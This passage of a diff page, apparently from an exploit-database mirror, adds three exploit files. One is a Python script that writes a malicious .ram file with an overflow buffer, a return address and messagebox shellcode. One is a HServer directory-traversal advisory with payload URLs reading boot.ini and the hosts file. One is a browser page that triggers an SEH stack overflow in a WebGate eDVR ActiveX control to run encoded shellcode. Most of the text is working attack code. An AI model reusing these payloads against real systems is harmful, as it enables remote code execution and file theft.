file="crack.ram"
|
||||
junk="\x41"*35032
|
||||
eip=pack('<I',0x7C9D30D7)
|
||||
junk2="\x44"*4
|
||||
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
|
||||
#http://www.exploit-db.com/exploits/28996/
|
||||
shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
|
||||
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
|
||||
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
|
||||
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
|
||||
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
|
||||
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
|
||||
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
|
||||
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
|
||||
writeFile = open (file, "w")
|
||||
writeFile.write(junk+eip+junk2+shellcode)
|
||||
writeFile.close()
|
12
platforms/windows/remote/36500.txt
Executable file
12
platforms/windows/remote/36500.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/51286/info
|
||||
|
||||
HServer web server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
|
||||
|
||||
Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.
|
||||
|
||||
HServer 0.1.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/..%5c..%5c..%5cboot.ini
|
||||
http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
|
||||
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
|
||||
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts
|
88
platforms/windows/remote/36505.txt
Executable file
88
platforms/windows/remote/36505.txt
Executable file
|
@ -0,0 +1,88 @@
|
|||
<html>
|
||||
<!--
|
||||
# Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day)
|
||||
# Date: 26th MArch, 2015
|
||||
# Exploit Author: Praveen Darshanam
|
||||
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
|
||||
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
|
||||
# Version: 1, 6, 42, 0
|
||||
# Tested on: Windows XP SP3 (IE6/7/8)
|
||||
# CVE : 2015-2097
|
||||
|
||||
targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
|
||||
prototype = "Sub LoadImage ( ByVal bstrFullPath As String )"
|
||||
memberName = "LoadImage"
|
||||
progid = "WESPMONITORLib.WESPMonitorCtrl"
|
||||
argCount = 1
|
||||
For full analysis of the exploit refer
|
||||
http://blog.disects.com/2015/03/webgate-edvr-manager.html
|
||||
-->
|
||||
|
||||
<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'>
|
||||
</object>
|
||||
<script>
|
||||
var arg1 = "";
|
||||
nops = "";
|
||||
var buff = "";
|
||||
|
||||
for(i=0;i<268;i++)
|
||||
{
|
||||
arg1 += "B";
|
||||
}
|
||||
|
||||
nseh = "\xeb\x10\x90\x90"; //jmp over addr
|
||||
seh = "\x71\x47\x01\x10"; //pop pop ret addr
|
||||
document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");
|
||||
|
||||
for(i=0;i<200;i++)
|
||||
{
|
||||
nops += "\x90";
|
||||
}
|
||||
|
||||
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
|
||||
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
|
||||
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
|
||||
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
|
||||
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
|
||||
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
|
||||
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
|
||||
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
|
||||
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
|
||||
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
|
||||
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
|
||||
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
|
||||
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
|
||||
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
|
||||
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
|
||||
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
|
||||
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
|
||||
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
|
||||
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
|
||||
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
|
||||
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
|
||||
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
|
||||
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
|
||||
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
|
||||
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
|
||||
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
|
||||
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
|
||||
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
|
||||
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
|
||||
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
|
||||
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
|
||||
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
|
||||
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
|
||||
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
|
||||
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
|
||||
|
||||
for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++)
|
||||
{
|
||||
buff += "A";
|
||||
}
|
||||
|
||||
// [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode]
|
||||
fbuff = arg1 + nseh + seh + nops + sc + buff;
|
||||
target.LoadImage(fbuff);
|
||||
|
||||
</script>
|
||||
</html>
|
Loading…
Add table
Reference in a new issue